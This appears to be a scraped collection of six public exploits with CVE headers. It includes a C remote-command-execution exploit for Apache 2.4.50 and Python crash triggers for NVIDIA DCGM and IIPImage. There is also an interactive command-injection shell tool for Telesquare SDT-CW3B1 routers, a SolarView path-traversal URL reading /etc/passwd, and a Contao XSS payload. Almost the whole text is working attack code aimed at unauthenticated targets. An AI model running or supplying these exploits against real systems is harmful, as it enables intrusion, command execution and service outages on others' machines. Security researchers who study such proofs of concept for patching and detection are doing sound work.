<pre><code>#include <stdio.h><br />#include <stdlib.h><br />#include <stdbool.h><br />#include <string.h><br />#include <curl/curl.h><br /><br />/* Apache 2.4.50 exploit (CVE-2021-42013)<br /> * Author: Vilius Povilaika<br /> * Website: www.povilaika.com */<br /><br />// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013<br /><br />int usage(char* prog)<br />{<br /> printf("Usage: %s <host> <exec>\n", prog);<br /> printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);<br /> return 0;<br />}<br /><br />bool error(const char* reason)<br />{<br /> printf("[ERR] Critical error - %s\n", reason);<br /> return false;<br />}<br /><br />struct callback_result {<br /> char* data;<br /> size_t size;<br />};<br /><br />static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)<br />{<br /> struct callback_result *memory = (struct callback_result *)data;<br /> char* ptr = realloc(memory->data, memory->size+nmemb+1);<br /> memory->data = ptr;<br /> memcpy(&(memory->data[memory->size]), pointer, nmemb);<br /> memory->size += nmemb;<br /> memory->data[memory->size] = 0;<br /> return nmemb;<br />}<br /><br />bool exploit(void* result, char* host, char* exec)<br />{<br /> CURL *curl = curl_easy_init();<br /> char url[256];<br /> sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);<br /> curl_easy_setopt(curl, CURLOPT_URL, url);<br /> char payload[256];<br /> sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);<br /> curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);<br /> curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);<br /> curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);<br /> int res = curl_easy_perform(curl);<br /> if (res != CURLE_OK)<br /> return error(curl_easy_strerror(res));<br /> curl_easy_cleanup(curl);<br /> return true;<br />}<br /><br />int main(int argc, char* argv[])<br />{<br /> if (argc != 3)<br /> return usage(argv[0]);<br /> struct callback_result result = {0};<br /> bool res = exploit(&result, argv[1], argv[2]);<br /> if (res)<br /> printf("[+] Exploit finished successfully, check output\n");<br /> else<br /> printf("[-] Exploit failed, check output\n");<br /> printf(" \n%s\n", result.data);<br /> return 0;<br />}<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: UTF-8 -*-<br />#<br /># heart.py<br />#<br /># NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health<br /># data. nv-hostengine is a daemon that by default listens on the loopback interface,<br /># but can also listen on the network for requests coming in on port 5555 (remote mgmt).<br /># A native client named DCGMI allows users to make requests to the daemon to support<br /># a variety of functions. Malformed packets can cause the daemon (running as root<br /># or user account) to crash or potentially result in code execution.<br />#<br /># More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html<br />#<br /># Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)<br />#<br /># $ ./heart.py 10.0.0.201 --trigger pkt3-mem<br />#<br /># $ gdb `which nv-hostengine`<br /># (gdb) r -b ALL -n<br /># nv-hostengine running as non-root. Some functionality will be limited.<br /># Started host engine version 2.3.1 using port number: 5555<br /># ...<br /># Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.<br />#<br /># (gdb) i r<br /># rax 0x7ffbb3dbd010 140719031046160<br /># rbx 0x7ffff771ac70 140737344810096<br /># rcx 0x7ffbb3dbd010 140719031046160<br /># rdx 0x424242420 17786217504<br /># rsi 0x7ffff771aee4 140737344810724<br /># rdi 0x7ffbb3dbd010 140719031046160<br /># rbp 0x7ffff771ac40 0x7ffff771ac40<br /># rsp 0x7ffff771abe8 0x7ffff771abe8<br /># r8 0x424242420 17786217504<br /># r9 0x0 0<br /># r10 0x7ffbb3dbd010 140719031046160<br />#<br /># CVE‑2022‑21820<br />#<br /><br />import os<br />import sys<br />import argparse<br />import time<br />import shutil<br />import signal<br />import socket<br /><br />DEFAULT_PORT = 5555<br /><br />PKT_START = b'\xad\xbc\xbc\xad'<br /><br />#<br /># Trigger #1: Memory Corruption via malformed packet 3<br />#<br />TRIGGER_ONE_PKT_1 = PKT_START + \<br /> b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'<br /><br />TRIGGER_ONE_PKT_2 = PKT_START + \<br /> b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'<br /><br /># 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420<br />TRIGGER_ONE_PKT_3 = PKT_START + \<br /> b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \<br /> b'\x84' * 51 + \<br /> b'\x00' * 488 + \<br /> b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \<br /> b'\x00' * 207 + \<br /> b'\x01\x00\x00\x00'<br /><br />#<br /># Trigger #2: NULL ptr write via malformed packet 4<br />#<br />TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1<br /><br />TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2<br /><br />TRIGGER_TWO_PKT_3 = PKT_START + \<br /> b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \<br /> b'\x00' * 12 + \<br /> b'\x01\x00\x00\x00\x01' + \<br /> b'\x00' * 523 + \<br /> b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \<br /> b'\x00' * 207 + \<br /> b'\x01\x00\x00\x00'<br /><br /># 0x79 triggers crash<br />TRIGGER_TWO_PKT_4 = PKT_START + \<br /> b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \<br /> b'\xff' * 9 + \<br /> b'\x01' + \<br /> b'\x79' + \<br /> b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'<br /><br />class Heart(object):<br /> def __init__(self, args):<br /> self.host = args.host<br /> self.trigger = args.trigger<br /><br /> def run(self):<br /> if(self.trigger == None):<br /> print("error: choose which bug use via --trigger")<br /> return -1<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, DEFAULT_PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> return -1<br /><br /> if(self.trigger == 'pkt3_mem'):<br /> if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):<br /> print("failed to send/recv packet 1\n")<br /> return -1<br /><br /> if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):<br /> print("failed to send/recv packet 2\n")<br /> return -1<br /><br /> if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):<br /> print("failed to send/recv packet 3\n")<br /> return -1<br /><br /> if(self.trigger == 'pkt4_null'):<br /> if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):<br /> print("failed to send/recv packet 1\n")<br /> return -1<br /><br /> if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):<br /> print("failed to send/recv packet 2\n")<br /> return -1<br /><br /> if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):<br /> print("failed to send/recv packet 3\n")<br /> return -1<br /><br /> if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):<br /> print("failed to send/recv packet 4\n")<br /> return -1<br /><br /> print("done\n")<br /><br /> return 0<br /><br /> def getSock(self):<br /> try:<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.settimeout(2)<br /> except Exception as error:<br /> print("socket() failed: %s\n" % error)<br /> return None<br /><br /> return sock<br /><br /> def sendPacket(self, sock, pkt):<br /> try:<br /> sock.send(pkt)<br /> except Exception as error:<br /> print("socket send error: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.recv(256)<br /> except Exception as error:<br /> # print("socket recv error: %s\n" % error)<br /> return 0 # expected for pkt3_mem<br /><br /> return 0<br /><br />def signalExit(signum, frame):<br /> sys.exit(-1)<br /><br />def arg_parse():<br /> parser = argparse.ArgumentParser()<br /><br /> parser.add_argument("host",<br /> type=str,<br /> help="target host")<br /><br /> parser.add_argument("--trigger",<br /> "--trigger",<br /> type=str,<br /> choices=['pkt3_mem', 'pkt4_null'],<br /> help="which bug to trigger")<br /><br /> args = parser.parse_args()<br /><br /> return args<br /><br />def main():<br /> signal.signal(signal.SIGINT, signalExit)<br /><br /> args = arg_parse()<br /><br /> rh = Heart(args)<br /><br /> result = rh.run()<br /><br /> if(result > 0):<br /> sys.exit(-1)<br /><br />if(__name__ == '__main__'):<br /> main()<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: UTF-8 -*-<br />#<br /># thiel.py<br />#<br /># IIPImage Multiple Remote Memory Corruption Vulnerabilities<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># IIPImage is distributed with a server that enables advanced, high-performance<br /># image manipulation for web-based streaming and viewing of high resolution images.<br /># The server component called iipsrv.fcgi processes requests from users and passes<br /># them to command handlers. Several crashes including an integer overflow were<br /># discovered by sending malformed requests to the server, allowing remote users<br /># without authentication to perform denial-of-service attacks or potentially<br /># crafted for remote code execution as the server's running user.<br />#<br /># Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration<br />#<br /># Demo<br />#<br /># $ ./thiel.py http://10.0.0.201 --trigger iiif<br />#<br /># (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally<br /># ...<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br /># (gdb) i r<br /># rax 0x7ffef6d50b68 140733039577960<br /># rbx 0xffffffff 4294967295<br /># rcx 0xb3 179<br /># rdx 0x6 6<br /># rsi 0x5555556ae20d 93824993649165<br /># rdi 0x7ffef6d50b68 140733039577960<br /># rbp 0x7fffffffc690 0x7fffffffc690<br /># rsp 0x7fffffffc4b8 0x7fffffffc4b8<br /># r8 0x0 0<br /># r9 0x0 0<br /># r10 0x55555564f4e0 93824993260768<br /># r11 0x7ffef6d50b68 140733039577960<br /># r12 0xb58 2904<br /># r13 0x81 129<br /># r14 0x1e4 484<br /># r15 0x8 8<br /># rip 0x7ffff7a53708 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152><br />#<br /># => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>: mov ecx,DWORD PTR [rsi+rdx*1-0x4]<br />#<br /># 0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br /># 1 0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34<br /># 2 TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470<br /># 3 0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222<br /># 4 0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656<br /># 5 0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741<br />#<br /># Fixes<br /># - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195<br />#<br /># CVE-2021-46389<br />#<br /><br />import os<br />import sys<br />import argparse<br />import signal<br />import requests<br /><br />PATH = '/fcgi-bin/iipsrv.fcgi'<br /><br />#<br /># also there's many params for some functions like fif such as obj, qlt, sds,<br /># cnt, cvt, wid, rgn, etc so the code definitely needs lots of input validation<br />#<br />QUERY_FIF = '?fif='<br />QUERY_IIIF = '?iiif='<br />QUERY_SPECTRA = '?spectra='<br /><br />#<br /># Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. IIIF big region)<br />#<br /># sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff<br />#<br />VALID_FILE = '/var/www/test.tif'<br /><br />### BUGS ###<br />#<br /># Bug #1: Integer overflow @ TileManager::getRegion()<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br />#<br /># REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image<br /># REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image error<br />REQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV<br /># REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run)<br /><br />#<br /># Bug #2: NULL ptr deref @ SPECTRA::run<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) at IIPImage.h:335<br /># 335 unsigned int getTileWidth() { return tile_width; };<br />#<br />REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary<br /><br />#<br /># Bug #3: Another crash @ JTL::run<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324<br /># 324 unsigned int getImageWidth( int n=0 ) { return image_widths[n]; };<br />#<br />REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash<br />#<br />### END BUGS ###<br /><br /><br />class Thiel(object):<br /> def __init__(self, args):<br /> self.host = args.host<br /> self.trigger = args.trigger<br /><br /> def run(self):<br /> if(self.trigger == None):<br /> print("error: choose which bug use via --trigger")<br /> return -1<br /><br /> if(self.trigger == 'iiif'):<br /> return self.sendRequest(self.host, REQ_IIIF)<br /><br /> if(self.trigger == 'spectra'):<br /> return self.sendRequest(self.host, REQ_SPECTRA)<br /><br /> if(self.trigger == 'fif_jtl'):<br /> return self.sendRequest(self.host, REQ_FIF_JTL)<br /><br /> return 0<br /><br /> def sendRequest(self, host, req):<br /> session = requests.Session()<br /><br /> try:<br /> resp = session.get(host + PATH + req)<br /> except Exception as error:<br /> print("Error: %s" % error)<br /> return -1<br /><br /> if(b'502 Bad Gateway' in resp.content):<br /> print("done\n")<br /> return 0<br /> else:<br /> print("[-] iipsrv still appears to be up\n")<br /> return -1<br /><br />def signalExit():<br /> sys.exit(-1)<br /><br />def arg_parse():<br /> parser = argparse.ArgumentParser()<br /><br /> parser.add_argument("host",<br /> type=str,<br /> help="target host")<br /><br /> parser.add_argument("--trigger",<br /> "--trigger",<br /> type=str,<br /> choices=['iiif', 'spectra', 'fif_jtl'],<br /> help="which bug to trigger")<br /><br /> args = parser.parse_args()<br /><br /> return args<br /><br />def main():<br /> signal.signal(signal.SIGINT, signalExit)<br /><br /> args = arg_parse()<br /><br /> pt = Thiel(args)<br /><br /> result = pt.run()<br /><br /> if(result > 0):<br /> sys.exit(-1)<br /><br />if(__name__ == '__main__'):<br /> main()<br /></code></pre>
<pre><code>#!/usr/bin/python3 <br /><br /># Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection<br /># Date: 24th May 2022<br /># Exploit Author: Bryan Leong <NobodyAtall><br /># Vendor Homepage: http://telesquare.co.kr/<br /># CVE : CVE-2021-46422<br /># Authentication Required: No<br /><br />import requests <br />import argparse <br />import sys<br />from xml.etree import ElementTree<br /><br />def sysArgument():<br /> ap = argparse.ArgumentParser()<br /> ap.add_argument("--host", required=True, help="target hostname/IP") <br /> args = vars(ap.parse_args())<br /> return args['host']<br /><br />def checkHost(host):<br /> url = "http://" + host<br /><br /> print("[*] Checking host is it alive?")<br /><br /> try:<br /> rsl = requests.get(url) <br /> print("[*] The host is alive.")<br /> except requests.exceptions.Timeout as err:<br /> raise SystemExit(err)<br /><br />def exploit(host):<br /> url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" <br /><br /> #checking does the CGI exists?<br /> rsl = requests.get(url)<br /><br /> if(rsl.status_code == 200):<br /> print("[*] CGI script exist!")<br /> print("[*] Injecting some shell command.")<br /><br /> #1st test injecting id command<br /> cmd = "id"<br /><br /> try:<br /> rsl = requests.get(url + cmd, stream=True)<br /> xmlparser = ElementTree.iterparse(rsl.raw)<br /><br /> cmdRet = []<br /><br /> for event, elem in xmlparser:<br /> if(elem.tag == 'CmdResult'):<br /> cmdRet.append(elem.text)<br /> except:<br /> print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")<br /> sys.exit(0)<br /><br /> if(len(cmdRet) != 0):<br /> print("[*] There's response from the CGI script!")<br /> print('[*] System ID: ' + cmdRet[0].strip())<br /> <br /> print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")<br /> #start shell iteration<br /> while(True):<br /> cmdInput = input("[SDT-CW3B1 Shell]# ")<br /><br /> if(cmdInput == ".exit"):<br /> print("[*] Exiting shell.")<br /> sys.exit(0)<br /><br /> rsl = requests.get(url + cmdInput, stream=True)<br /> xmlparser = ElementTree.iterparse(rsl.raw)<br /><br /><br /> for event, elem in xmlparser:<br /> if(elem.tag == 'CmdResult'):<br /> print(elem.text.strip())<br /><br /> print('\n')<br /> <br /> else:<br /> print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")<br /> sys.exit(0)<br /><br /> else:<br /> print("[!] CGI script not found.")<br /> print(rsl.status_code)<br /> sys.exit(0)<br /><br />def main():<br /> host = sysArgument()<br /><br /> checkHost(host)<br /> exploit(host)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: SolarView Compact 6.00 - Directory Traversal<br /># Date: 2022-05-15<br /># Exploit Author: Ahmed Alroky<br /># Author Company : Aiactive<br /># Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/<br /># Version: ver.6.00<br /># Vendor home page : https://www.contec.com/<br /># Authentication Required: No<br /># CVE : CVE-2022-29298<br /><br /># Tested on: Windows<br /><br /># Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg<br /><br /></code></pre>
<pre><code># Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 04/28/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://contao.org/en/<br /># Software Link: https://github.com/contao/contao/releases/tag/4.13.2<br /># Version: [ 4.13.2 ] <br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-1588<br /># References: <br />- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/<br />- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2<br />- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html<br />---------------<br /><br />Steps to reproduce:<br />Navigate to the below URL<br />URL: https://localhost/contao/"><svg//onload=alert(112233)><br /><br /></code></pre>